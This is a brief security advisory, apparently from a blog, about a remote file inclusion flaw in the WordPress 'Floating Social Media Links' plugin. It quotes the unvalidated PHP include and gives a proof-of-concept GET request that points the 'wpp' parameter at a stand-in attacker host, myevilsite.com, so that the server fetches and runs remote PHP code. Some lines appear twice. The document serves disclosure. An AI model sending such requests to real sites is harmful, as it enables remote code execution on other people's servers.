WordPress Floating Social Media Link Plugins Remote File Inclusion

Advisory

Analysis

The fsml-admin.js.php and fsml-hideshow.js.php both require a get parameter to specify the path for the wp-load.php file, used to initialize the WordPress backend.

//include the wordpress environment, so we can get the options and 
//write the js accordingly
REQUIRE $_GET['wpp'] . '/wp-load.php';

//include the wordpress environment, so we can get the options and

//write the js accordingly

REQUIRE $_GET['wpp'] . '/wp-load.php';

However the wpp parameter is used without validation that it does not contain a malicious input. We can thus provide an url to malicious PHP code, which will be executed by the remote host, like this:

GET /wordpress/wp-content/plugins/floating-social-media-links/fsml-hideshow.js.php?wpp=http://myevilsite.com HTTP/1.1
Host: 192.168.80.130

1 2	GET /wordpress/wp-content/plugins/floating-social-media-links/fsml-hideshow.js.php?wpp=http://myevilsite.com HTTP/1.1 Host: 192.168.80.130

ceriksen.com

WordPress Floating Social Media Link Plugins Remote File Inclusion

Leave a Reply Cancel reply